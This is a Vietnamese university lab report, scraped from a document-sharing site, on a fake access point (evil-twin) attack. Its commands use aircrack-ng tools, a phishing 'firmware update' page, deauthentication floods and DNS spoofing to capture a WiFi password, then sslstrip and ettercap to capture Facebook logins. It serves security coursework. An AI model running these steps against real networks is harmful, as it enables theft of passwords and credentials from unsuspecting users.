An toàn mạng không dây và di động: FAKE ACCESS POINT SNIFFER PASSWORD

11 93 0
An toàn mạng không dây và di động: FAKE ACCESS POINT SNIFFER PASSWORD

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

Báo cáo Lab Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh BÁO CÁO LAB FAKE ACCESS POINT SNIFFER PASSWORD Mơn học An tồn mạng khơng dây di động GVHD: Lê Đức Thịnh Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh Trang / 11 Báo cáo Lab Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh I LẤY MẬT KHẨU AP GỐC: Cài đặt isc-dhcp-server: Cài đặt: apt-get update apt-get install isc-dhcp-server Cấu hình: Mở tập tin: nano /etc/dhcp/dhcpd.conf authoritative; default-lease-time 600; max-lease-time 7200; subnet 192.168.1.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 192.168.1.255; option routers 192.168.1.1; option domain-name-servers 192.168.10.1; # tùy vào máy range 192.168.1.1 192.168.1.100; } Giải xung đột airmon-ng Network Manager: Trang / 11 Báo cáo Lab Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh Gõ lệnh: nano /etc/NetworkManager/NetworkManager.conf Thêm vào sau tập tin: [keyfile] unmanaged-devices=interface-name:wlan0mon;interface-name:wlan1mon;interfacename:wlan2mon;interface-name:wlan3mon;interface-name:wlan4mon;interfacename:wlan5mon;interface-name:wlan6mon;interface-name:wlan7mon;interfacename:wlan8mon;interface-name:wlan9mon;interface-name:wlan10mon;interfacename:wlan11mon;interface-name:wlan12mon Lưu thoát Chuyển card wifi chế độ giám sát: Gõ lệnh: airmon-ng start wlan0 Gõ lệnh: airodump-ng wlan0mon để tiến hành lắng nghe kết nối khơng Tìm kiếm thông tin mục tiêu Trang / 11 Báo cáo Lab Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh Ghi chép lại thông tin mục tiêu:  BSSID: C8:3A:35:2E:AE:F8  CH:  ESSID: GauGau Tạo AP giả: Dùng lệnh: airbase-ng -e "GauGau"-c wlan0mon để tạo AP giả không cần mật Lúc AP giả tạo interface at0 để bắt cầu định tuyến tới AP giả mạo Gán IP định tuyến mạng lớp 192.168.1.0/24 thông qua interface at0 tạo Thiết lập NAT cách thiết đặt luật cho tường lửa IPTABLES: Gõ lệnh sau: iptables table nat append POSTROUTING out-interface eth0 -j MASQUERADE iptables append FORWARD in-interface at0 -j ACCEPT Bật chế độ chuyển tiếp lưu lượng mạng Trang / 11 Báo cáo Lab Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh echo > /proc/sys/net/ipv4/ip_forward Khởi động dịch vụ: Chúng ta khởi động dịch vụ isc-dhcp-server, apache2, mysql Gõ lệnh sau: systemctl start isc-dhcp-server systemctl start apache2 systemctl start mysql Tạo giao diện web sở liệu: Tải tập tin rogue_AP.zip từ http://www.rootsh3ll.com/rogue-ap-download/ máy Tập tin chứa giao diện web, nạn nhân kết nối vào AP giả mạo, mở trình duyệt web bị chuyển hướng đến trang web yêu cầu nhập mật wifi để cập nhật firmware Mặc định thư mục chứa mã trang web kali /var/www/html Ta giải nén tập tin vào thư mục Gõ lệnh: unzip rogue_AP.zip -d /var/www/html/ Ta thấy có tập tin dbconnect.php, tập tin chứa mã nguồn kết nối đến mysql server nơi lưu mật nạn nhân nhập vào Cấu hình sở liệu Trang / 11 Báo cáo Lab Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh Gõ lệnh: mysql -u root –p (mặc định mật trống) Chúng ta thêm người dùng tên “fakeap” với mật “fakeap” Gõ lệnh: create user fakeap@localhost identified by 'fakeap'; Thêm sở liệu: Gõ lệnh: create database rogue_AP; use rogue_AP; create table wpa_keys(password1 varchar(32), password2 varchar(32)); Nó trơng sau: Cấp quyền truy cập vào sở liệu ‘rogue_AP’ cho người dùng ‘fakeap’ Gõ lệnh: grant all privileges on rogue_AP.* to 'fakeap'@'localhost'; Kiểm tra: Gõ lệnh: mysql -u fakeap –p (mật fakeap) Gõ lệnh: use rogue_AP; chuyển sở liệu insert into wpa_keys(password1, password2) values ("testpass", "testpass"); chèn liệu để kiểm thử select * from wpa_keys; in liệu vừa nhập Ta kết quả: Trang / 11 Báo cáo Lab Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh Với kết tương tự việc tạo sở liệu thành công Tấn công AP mục tiêu đợi nạn nhân: Gõ lệnh: aireplay-ng deauth -a C8:3A:35:2E:AE:F8 wlan0mon Với C8:3A:35:2E:AE:F8 BSSID thu thập mục deauth gởi liên tục gói de-authentication đến AP mục tiêu ngắt máy khách (client) kết nối bắt buộc họ kết nối vào AP giả mà tạo Sau khoảng thời gian, nạn nhân nhận AP gốc khơng thể kết nối, có AP giống tên AP gốc ‘GauGau’, họ kết nối vào AP giả mạo Trang / 11 Báo cáo Lab Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh Bây nạn nhân truy cập vào AP giả mạo Chúng ta chuyển hướng nạn nhân đến trang web giả mạo dựng mục để lấy mật wifi AP gốc Gõ lệnh: dnsspoof -i at0 Lệnh phân giải tên miền IP: 192.168.1.1 Tức nạn nhân bị chuyển web giả mạo Trang / 11 Báo cáo Lab Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh Sau nạn nhân nhập mật khẩu, trang web chuyển hướng vờ cập nhật firmware Khi sở liệu có mật AP gốc II TẤN CƠNG MAN IN THE MIDDLE: Mơ hình: Trang / 11 Báo cáo Lab Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh Trên Kali: Thêm luật sau vào iptables: iptables -t nat -A PREROUTING -p tcp destination-port 80 -j REDIRECT to-port 10000 luật chuyển hướng kết nối http đến cổng 10000 Gõ lệnh: sslstrip -p –k –l 10000 Ý nghĩa lệnh dùng sslstrip để chuyển giao thức https -> http ghi log phương thức POST giao thức http với cổng lắng nghe 10000 Gõ lệnh: ettercap -p -u -T -q -i at0 Dùng ettercap để lắng nghe kết nối đến card mạng at0 lấy thông tin Trên Win 7: Người dùng kết nối đến AP giả mạo mở trình duyệt web vào facebook.com đăng nhập Trang 10 / 11 Báo cáo Lab Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ Sinh viên 2: 14520842 – Nguyễn Hồng Thanh Kết ta bắt thơng tin đăng nhập HẾT Trang 11 / 11 ... lệnh: nano /etc/NetworkManager/NetworkManager.conf Thêm vào sau tập tin: [keyfile] unmanaged-devices=interface-name:wlan0mon;interface-name:wlan1mon;interfacename:wlan2mon;interface-name:wlan3mon;interface-name:wlan4mon;interfacename:wlan5mon;interface-name:wlan6mon;interface-name:wlan7mon;interfacename:wlan8mon;interface-name:wlan9mon;interface-name:wlan10mon;interfacename:wlan11mon;interface-name:wlan12mon... unmanaged-devices=interface-name:wlan0mon;interface-name:wlan1mon;interfacename:wlan2mon;interface-name:wlan3mon;interface-name:wlan4mon;interfacename:wlan5mon;interface-name:wlan6mon;interface-name:wlan7mon;interfacename:wlan8mon;interface-name:wlan9mon;interface-name:wlan10mon;interfacename:wlan11mon;interface-name:wlan12mon... tùy vào máy range 192.168.1.1 192.168.1.100; } Giải xung đột airmon-ng Network Manager: Trang / 11 Báo cáo Lab Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh Gõ

Ngày đăng: 12/05/2020, 15:46

Từ khóa liên quan

Tài liệu cùng người dùng

Tài liệu liên quan